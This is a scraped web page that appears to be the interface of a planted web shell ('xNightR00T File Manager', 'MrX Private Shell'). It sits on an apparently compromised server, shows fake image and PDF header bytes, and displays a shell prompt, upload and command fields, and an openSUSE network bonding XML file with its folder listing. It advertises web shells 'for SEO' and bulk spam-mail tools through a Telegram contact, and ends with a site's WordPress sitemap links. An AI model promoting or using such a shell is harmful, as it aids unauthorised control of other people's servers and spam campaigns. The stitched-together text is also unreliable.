xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<service name="bonding" interface="org.opensuse.Network.Bond" object-class="netif-bond">
 <description>
   This link-layer service is provided by all bonding devices.

   Bond devices can be created through the org.opensuse.Network.Bond.Factory
   factory interface.
 </description>

 <!-- This is the device-info returned in interface reports -->
 <define name="device-info" class="dict">
   <mode type="builtin-bonding-mode"/>
   <!-- At least one slave element has to occur.
        Bonding requires at least one available slave at start time,
        other slaves can be added later (hotplugged).

        At most one of them may be marked as primary or active in
        active-backup, balance-tlb or balance-alb modes. This forces
        the use as primary or active and overwries kernels choice.
     -->
   <define name="slave" class="dict">
     <device type="string">
       <meta:netif-reference shared="false" />
       <meta:require check="netif-check-state" op="linkUp" min-state="device-up" />
     </device>

     <active type="boolean"/>
     <primary type="boolean"/>

     <state type="builtin-bonding-slave-state"/>
     <mii-status type="builtin-bonding-slave-mii-status"/>
     <perm-hwaddr type="ethernet-address"/>
     <link-failures type="uint32"/>
     <queue-id type="uint16"/>
     <ad-aggregator-id type="uint16"/>
   </define>
   <slaves class="array" element-type="slave" constraint="required" minlen="1" />

   <!-- Link monitoring options.
        There must be exactly one of either arpmon or miimon present,
        which selects either mii or arp monitoring. Lack of both is an
        error. If both are present, the behavior is undefined.
     -->
   <arpmon class="dict">
     <interval type="uint32" constraint="required" description="ARP link monitoring frequency in milliseconds." />
     <validate type="builtin-bonding-arp-validate"/>
     <validate-targets type="uint32" constraint="enum">
       <any value="0"/>
       <all value="1"/>
     </validate-targets>
     <!-- targets class="array" element-type="ipv4-address" minlen="1"/ -->
     <targets class="array" constraint="required" minlen="1" element-type="string" element-name="address" />
   </arpmon>

   <miimon class="dict">
     <frequency type="uint32" constraint="required" description="Specifies the MII link monitoring frequency in milliseconds.
             This determines how often the link state of each slave is inspected for link failures."/>
     <updelay type="uint32" description="Specifies the time, in milliseconds, to wait before enabling a
             slave after a link recovery has been detected."/>
     <downdelay type="uint32" description="Specifies the time, in milliseconds, to wait before disabling
	     a slave after a link failure has been detected."/>
     <carrier-detect type="builtin-bonding-mii-carrier-detect"/>
   </miimon>

   <xmit-hash-policy type="builtin-bonding-xmit-hash-policy"/>
   <lacp-rate type="builtin-bonding-lacp-rate"/>
   <ad-select type="builtin-bonding-ad-select"/>
   <ad-user-port-key  type="uint16"/>
   <ad-actor-sys-prio type="uint16"/>
   <ad-actor-system   type="ethernet-address"/>
   <fail-over-mac type="builtin-bonding-fail-over-mac"/>
   <primary-reselect type="builtin-bonding-primary-reselect"/>

   <all-slaves-active type="boolean" description="Enable to deliver duplicate frames received on inactive slaves when enabled instead of dropping them." />
   <min-links type="uint32" description="Specifies the minimum number of links that must be active before asserting carrier."/>
   <num-grat-arp type="uint32" constraint="range" description="Specify the number of peer notifications using gratuitous ARPs to be issued after a failover event. Default is 1">
    <min value="0"/>
    <max value="255"/>
   </num-grat-arp>
   <num-unsol-na type="uint32" constraint="range" description="Specify the number of peer notifications usingunsolicited IPv6 Neighbor Advertisements to be issued after a failover event. Default is 1">
     <min value="0"/>
     <max value="255"/>
   </num-unsol-na>
   <resend-igmp type="uint32" constraint="range" description="Specify the number of IGMP membership reports to be issued after a failover event.">
     <min value="0"/>
     <max value="255"/>
   </resend-igmp>
   <packets-per-slave type="uint32" constraint="range">
     <min value="0"/>
     <max value="65535"/>
   </packets-per-slave>
   <tlb-dynamic-lb type="boolean"/>
   <lp-interval type="uint32" constraint="range">
     <min value="1"/>
     <max value="2147483647"/>
   </lp-interval>

   <address class="array" element-type="byte" minlen="6" maxlen="20" notation="hwaddr"/>
 </define>

 <define name="properties" type="device-info"/>

 <method name="changeDevice">
  <arguments>
    <config type="bonding:device-info">
      <meta:mapping document-node="/bond"/>
    </config>
  </arguments>
 </method>

<!-- Later, not implemented yet
 <method name="addSlave">
  <arguments>
   <name type="string" />
  </arguments>
 </method>
-->

<!-- Later, not implemented yet
 <method name="removeSlave">
  <arguments>
   <name type="string" />
  </arguments>
 </method>
-->

<!-- Later, not implemented yet
 <method name="setActive">
  <arguments>
   <name type="string" />
  </arguments>
 </method>
-->

<!-- Later, not implemented yet:
 <method name="setPrimary">
  <arguments>
   <name type="string" />
  </arguments>
 </method>
-->

</service>

<service name="bonding-factory" interface="org.opensuse.Network.Bond.Factory" object-class="netif-list">
  <method name="newDevice">
    <arguments>
     <name type="string"/>
     <config type="bonding:device-info">
      <meta:mapping document-node="/bond"/>
     </config>
    </arguments>
    <return>
     <string/>
    </return>
  </method>
</service>

Filemanager

Name Type Size Permission Actions
addrconf.xml File 10.82 KB 0644
bonding.xml File 5.64 KB 0644
bridge.xml File 5.05 KB 0644
constants.xml File 16.29 KB 0644
dummy.xml File 1.69 KB 0644
ethernet.xml File 885 B 0644
ethtool.xml File 6.65 KB 0644
firewall.xml File 609 B 0644
gre.xml File 2.05 KB 0644
infiniband.xml File 2.33 KB 0644
interface.xml File 17.52 KB 0644
ipip.xml File 1.71 KB 0644
lldp.xml File 1.75 KB 0644
macvlan.xml File 3.11 KB 0644
ovs-bridge.xml File 1.91 KB 0644
ppp.xml File 2.68 KB 0644
protocol.xml File 2.44 KB 0644
scripts.xml File 2.13 KB 0644
sit.xml File 2.1 KB 0644
team.xml File 4.02 KB 0644
tuntap.xml File 2.37 KB 0644
types.xml File 2.51 KB 0644
vlan.xml File 1.57 KB 0644
vxlan.xml File 2.6 KB 0644
wicked.xml File 853 B 0644
wireless.xml File 4.25 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml